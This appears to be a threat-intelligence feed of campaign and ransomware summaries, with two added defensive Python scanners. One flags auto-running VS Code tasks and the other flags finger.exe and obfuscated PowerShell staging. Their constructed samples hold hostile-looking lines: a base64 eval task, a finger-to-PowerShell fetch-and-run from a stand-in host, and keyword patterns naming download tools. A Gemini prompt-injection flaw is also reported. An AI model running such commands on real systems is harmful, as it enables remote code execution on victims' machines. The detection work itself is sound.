APT28 is a long-running, GRU-linked espionage group that prioritizes stealthy credential access, targeted phishing, and long-term intelligence collection across Europe, North America, and Ukraine. Recent reporting through 2025 highlights new tooling like the LAMEHUG AI-assisted malware and sustained credential/token harvesting campaigns against services such as UKR[.]net. #APT28 #LAMEHUG
The ransomware claim alleges that crypto24 has targeted Yource Bulgaria & Greece, a provider of customer experience and contact center services, resulting in potential exposure of sensitive HR, customer, financial, and project data. The impacted countries are Bulgaria and Greece.
Enterprise AI adoption is accelerating, expanding security boundaries across Cloud, SaaS, and Endpoint environments and exposing a complex, AI-driven attack surface. Traditional security tools struggle to protect AI assets, making advanced AI security posture management essential for full visibility, risk assessment, data lineage, and zero-trust enforcement across the AI ecosystem. #HuggingFace #ModelContextProtocol
The 2025 State of Cloud Security Report highlights escalating challenges in cloud security, including rising data exposure, vulnerabilities, and attack paths exacerbated by AI adoption. It underscores the importance of managing neglected assets, securing Kubernetes environments, and controlling identity and access to mitigate evolving threats. #OrcaResearchPod #APT29 #Log4Shell #Spring4Shell #KubernetesSecurity #AIvulnerabilities
The VoidLink malware framework is an advanced Linux-based tool developed with significant AI assistance, likely by a single proficient developer. Its rapid development and sophisticated features demonstrate a new era of AI-driven malware creation. #VoidLink #AIDrivenMalware
North Korean threat actors have refined their tradecraft, distributing malicious Visual Studio Code projects that deliver backdoors and other payloads. The campaign uses a multi-stage chain, including obfuscated JavaScript and VS Code task configuration files, to compromise target systems and maintain persistence. #NorthKorea #VisualStudioCode #Backdoor #Vercel #DPRK…
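A practitioner reading the item above will want a quick way to triage a cloned repository before opening it in the editor. The scanner below is an added example, not code from the page or from the researchers it cites. It assumes the task configuration file is VS Code's `.vscode/tasks.json` and that auto-execution relies on VS Code's documented `"runOptions": {"runOn": "folderOpen"}` setting; whether this particular campaign uses exactly that key is not stated on the page. The sample tasks.json is constructed for the example.

```python
"""Flag VS Code tasks that auto-run on folder open and invoke an interpreter or LOLBin.

Added example (not the page's or the researchers' code). Assumptions:
- task file is VS Code's .vscode/tasks.json (JSONC: comments and trailing commas allowed)
- auto-run is the documented "runOptions": {"runOn": "folderOpen"} option
"""
import json
import re

# Interpreters and download utilities a legitimate build task rarely needs to start.
SUSPICIOUS_CMD = re.compile(
    r"(powershell|pwsh|cmd\.exe|wscript|cscript|mshta|curl|wget|node\s+-e|"
    r"Invoke-Expression|\bIEX\b|FromBase64String|DownloadString)",
    re.IGNORECASE,
)


def _strip_json_comments(text: str) -> str:
    """Turn JSONC (comments, trailing commas) into strict JSON for json.loads."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.DOTALL)
    text = re.sub(r"^\s*//.*$", "", text, flags=re.MULTILINE)
    text = re.sub(r",(\s*[}\]])", r"\1", text)
    return text


def task_command_line(task: dict) -> str:
    """Reassemble the command a task would run: command + args, including OS-specific overrides."""
    parts = []
    for scope in (task, task.get("windows", {}), task.get("linux", {}), task.get("osx", {})):
        cmd = scope.get("command")
        if isinstance(cmd, str):
            parts.append(cmd)
        for arg in scope.get("args", []):
            # args may be plain strings or {"value": ..., "quoting": ...} objects
            parts.append(arg if isinstance(arg, str) else str(arg.get("value", "")))
    return " ".join(parts)


def find_autorun_tasks(tasks_json: str) -> list[dict]:
    """Return one finding per task that runs automatically on folderOpen."""
    data = json.loads(_strip_json_comments(tasks_json))
    findings = []
    for task in data.get("tasks", []):
        run_on = (task.get("runOptions") or {}).get("runOn")
        if run_on != "folderOpen":
            continue
        cmdline = task_command_line(task)
        hit = SUSPICIOUS_CMD.search(cmdline)
        hidden = (task.get("presentation") or {}).get("reveal") == "never"
        reason = "auto-runs on folderOpen"
        if hit:
            reason += f" and calls {hit.group(0)}"
        if hidden:
            reason += " with terminal output hidden"
        findings.append({
            "label": task.get("label", "<unnamed>"),
            "command": cmdline,
            "severity": "high" if hit else "medium",
            "reason": reason,
        })
    return findings


# Constructed sample tasks.json: one normal build task, one auto-run task
# that hands a base64 blob to node -e and hides its terminal.
SAMPLE_TASKS_JSON = r'''{
  // constructed sample for this example, not a real artifact
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm",
      "args": ["run", "build"],
      "group": "build"
    },
    {
      "label": "Install dependencies",
      "type": "shell",
      "command": "node",
      "args": ["-e", "eval(Buffer.from('Y29uc29sZS5sb2coMSk=', 'base64').toString())"],
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" },
    },
  ]
}'''

if __name__ == "__main__":
    for finding in find_autorun_tasks(SAMPLE_TASKS_JSON):
        print(f"[{finding['severity']}] {finding['label']}: {finding['reason']}")
        print(f"    {finding['command']}")
```

Run it against `.vscode/tasks.json` of any repository before trusting the workspace; a folderOpen task is not malicious by itself, but one that starts a shell or decodes a blob deserves a look before the editor gets a chance to run it.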
A new malware family called PDFSider is being used in targeted attacks, including by multiple ransomware groups, to deploy advanced backdoors and evade detection. The malware leverages legitimate applications and sophisticated techniques like DLL sideloading and environmental checks to carry out cyberespionage and remote code execution. #PDFSider #MustangPanda #DLLSideloading #Cyberespionage…
The Qilin ransomware group has announced breaches affecting several organizations, including a Spanish engineering firm and a Taiwanese fashion supplier, by exfiltrating sensitive internal data. The stolen data comprises personal identification details, legal documents, and business records, highlighting their aggressive data theft tactics. #QilinRansomware #DataExfiltration #AltiusGeotecnia #YumarkEnterprises…
A Telegram-based illicit marketplace, Tudou Guarantee, is ceasing its major operations after processing over $12 billion in transactions, marking a significant shift in the cyber fraud landscape. Despite this, other marketplaces like HuiOne Guarantee and Xinbi Guarantee continue to operate, indicating a persistent threat environment. #TudouGuarantee #HuiOneGuarantee #XinbiGuarantee #PrinceGroup #PigButchering…
MecMatica, an Italian industrial monitoring and automation company, has been targeted by the Sarcoma ransomware group, resulting in a data breach involving 74 GB of sensitive information. The leak includes company databases, customer lists, personal identification documents, and internal files. #Sarcoma #MecMatica…
The ransomware claim warns about the negotiator “All4you” associated with the threat actor “Everest,” indicating targeted malicious activity. The affected country is unspecified.
KongTuke distributed a malicious Chrome extension (NexShield, typosquatting uBlock Origin Lite) that tracks installs via UUID beacons, delays execution, and triggers a browser denial-of-service while displaying a fake “CrashFix” popup to socially engineer victims. The campaign delivers a multi-stage infection chain, using finger.exe as a LOLBin, multi-layer PowerShell obfuscation and DGA domains, and culminating in ModeloRAT and a GateKeeper .NET payload with AES+XOR string encryption. #KongTuke #ModeloRAT
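The two detection opportunities in that chain that land in ordinary endpoint telemetry are the finger.exe LOLBin stage and the obfuscated PowerShell that follows it. The detector below is an added example, not code from the page or from the researchers behind the KongTuke reporting. It assumes process-creation events as JSON lines with Sysmon-style `Image`, `ParentImage` and `CommandLine` fields; the sample events are constructed for the example and are not captured from the campaign. finger.exe is the legitimate Windows finger client; abused as a LOLBin it pulls text from a remote host that is then piped into a shell.

```python
"""Flag finger.exe LOLBin staging and obfuscated PowerShell in process-creation logs.

Added example (not the page's or the researchers' code). Assumptions:
- events are JSON lines with Sysmon-style Image / ParentImage / CommandLine fields
- SAMPLE_EVENTS below is constructed, not captured from the KongTuke campaign
"""
import json
import re

# finger <user>@<host> reaching out to a remote host
FINGER_REMOTE = re.compile(r"finger(\.exe)?\s+\S+@\S+", re.IGNORECASE)
# its output piped straight into a shell interpreter
PIPE_TO_SHELL = re.compile(r"\|\s*(powershell|pwsh|cmd)(\.exe)?\b", re.IGNORECASE)
# individual PowerShell obfuscation/evasion markers; two or more together is the signal
PS_OBFUSCATION = [
    (re.compile(r"-(e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"FromBase64String", re.I), "base64 decode"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "invoke-expression"),
    (re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I), "hidden window"),
    (re.compile(r"\[char\]\s*\d+|-join|\s-replace\s", re.I), "string assembly"),
]


def _base(path: str) -> str:
    """Lower-case file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: dict) -> list[str]:
    """Return the detection reasons that fire for one process-creation event."""
    image = _base(event.get("Image", ""))
    parent = _base(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    reasons = []
    if image == "finger.exe" and "@" in cmd:
        reasons.append(f"finger.exe contacting remote host, spawned by {parent}")
    if FINGER_REMOTE.search(cmd) and PIPE_TO_SHELL.search(cmd):
        reasons.append("finger output piped into a shell")
    if image in ("powershell.exe", "pwsh.exe"):
        hits = [name for rx, name in PS_OBFUSCATION if rx.search(cmd)]
        if len(hits) >= 2:
            reasons.append("obfuscated PowerShell: " + ", ".join(hits))
    return reasons


def scan(lines) -> list[tuple[int, list[str]]]:
    """Run classify() over JSON lines; return (line number, reasons) for every hit."""
    out = []
    for n, line in enumerate(lines, 1):
        line = line.strip()
        if not line:
            continue
        reasons = classify(json.loads(line))
        if reasons:
            out.append((n, reasons))
    return out


# Constructed events: a cmd.exe one-liner staging via finger, the finger.exe child
# itself, an encoded hidden PowerShell launch, and two benign processes.
SAMPLE_EVENTS = r"""
{"Image":"C:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"cmd.exe /c finger admin@update.example.invalid | powershell -"}
{"Image":"C:\\Windows\\System32\\finger.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","CommandLine":"finger admin@update.example.invalid"}
{"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","CommandLine":"powershell -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}
{"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"powershell -NoProfile -Command Get-Process"}
{"Image":"C:\\Program Files\\Git\\cmd\\git.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"git fetch origin"}
"""

if __name__ == "__main__":
    for lineno, reasons in scan(SAMPLE_EVENTS.strip().splitlines()):
        print(f"line {lineno}: " + "; ".join(reasons))
```

The finger.exe rules are high-confidence on their own, since the client has almost no legitimate use on modern Windows endpoints; the PowerShell rule requires two markers at once so that an ordinary `-NoProfile -Command` invocation does not page anyone.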
A new malware strain called PDFSider is being used by ransomware threat actors to gain long-term access to a Fortune 100 finance company’s Windows systems. The malware employs sophisticated techniques like DLL side-loading and encrypted communication, highlighting advanced cyberattack capabilities. #PDFSider #QilinRansomware
A malicious campaign utilizing the NexShield extension crashes browsers and delivers ModeloRAT malware, targeting corporate and individual users. Researchers link the attack to the threat actor KongTuke, demonstrating evolving tactics to compromise enterprise networks. #KongTuke #ModeloRAT
Cybersecurity researchers have uncovered a vulnerability in Google Gemini that can be exploited through indirect prompt injection to bypass privacy controls and extract private calendar data. This highlights the growing security risks associated with AI-enabled features and their potential for misuse. #GoogleGemini #PromptInjection…